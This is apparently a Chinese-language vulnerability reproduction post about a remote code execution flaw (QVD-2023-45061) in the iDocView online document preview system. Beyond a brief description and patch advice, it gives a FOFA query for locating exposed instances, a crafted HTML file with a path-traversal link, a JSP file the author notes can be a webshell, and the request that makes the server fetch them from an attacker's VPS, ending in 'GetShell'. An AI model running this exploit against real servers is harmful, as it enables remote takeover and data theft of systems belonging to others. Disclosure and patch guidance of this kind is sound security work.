I Doc View在线文档预览系统RCE漏洞(QVD-2023-45061)

0x01 产品简介

iDocView是一个在线文档解析应用,旨在提供便捷的文件查看和编辑服务。

0x02 漏洞概述

漏洞成因

本次漏洞出现在在线文档解析应用中的远程页面缓存功能。具体问题在于该应用未能对用户输入的URL进行充分的安全验证,从而导致存在安全隐患。攻击者可通过构造特殊的URL,引诱应用下载恶意文件。

利用特征

攻击者利用该漏洞的关键在于使用具有远程页面缓存功能的接口,在参数中填写预先准备的包含恶意文件的URL。此类请求能够绕过正常的安全检查,使得服务器下载并处理恶意内容。漏洞的触发会返回特定的响应状态和内容类型条件,攻击者可通过自动化脚本进行检测和利用。

漏洞影响

该漏洞的利用可能导致服务器被远程控制、敏感数据泄露等等。漏洞的存在不仅威胁到该应用服务器的安全性,还可能成为更广泛网络安全事件的触发点。建议受影响的用户尽快采取必要的安全措施,以防范潜在的安全风险。

0x03 影响范围

iDocView < 13.10.1_20231115

0x04 复现环境

FOFA:title=="在线文档预览 - I Doc View"

0x05 漏洞复现

VPS上构造一个携带恶意link[href]的html文件,里面的link指向你的恶意文件

构造index.html

复制代码
<!DOCTYPE html>
<html lang="en">
<head>
    <title>test</title>
</head>
<body>
  <link href="/..\..\..\docview\test.jsp">
</body>
</html>

构造恶意文件

复制代码
vi '..\..\..\docview\test.jsp'


<%out.print("test");%>      #可以是马子

python开启一个http服务器,发送请求

复制代码
http://your-ip/html/2word?url=http://VPSip/index.html

当两个请求都响应200时会下载一个word文件,表示利用成功

验证

GetShell

0x06 修复建议

目前官方已发布安全修复版本,受影响用户可以自行更新或者联系相关技术支持获取最新版本或补丁修复漏洞。

https://api.idocv.com

缓解措施

隔离该系统对外访问,仅允许受信任网络或者用户访问。

拦截受影响Api接口的请求访问。

相关推荐
运维开发王义杰7 小时前
金融安全生命线:用AWS EventBridge和CloudTrail构建主动式入侵检测系统
安全·金融·aws
安全系统学习9 小时前
系统安全之大模型案例分析
前端·安全·web安全·网络安全·xss
加密狗复制模拟11 小时前
坚石ET ARM加密狗复制模拟介绍
安全·软件工程·个人开发
galaxylove12 小时前
Gartner发布塑造安全运营未来的关键 AI 自动化趋势
人工智能·安全·自动化
scuter_yu12 小时前
主流零信任安全产品深度介绍
运维·网络·安全
江苏思维驱动智能研究院有限公司12 小时前
Sophos 网络安全:全球领先的自适应安全解决方案提供商
网络·安全·web安全
小能喵14 小时前
Kali Linux Wifi 伪造热点
linux·安全·kali·kali linux
浩浩测试一下19 小时前
渗透信息收集- Web应用漏洞与指纹信息收集以及情报收集
android·前端·安全·web安全·网络安全·安全架构
Fortinet_CHINA1 天前
工业网络安全新范式——从风险可见性到量化防御的进化
安全·web安全
网安小白的进阶之路1 天前
A模块 系统与网络安全 第三门课 网络通信原理-3
网络·windows·安全·web安全·系统安全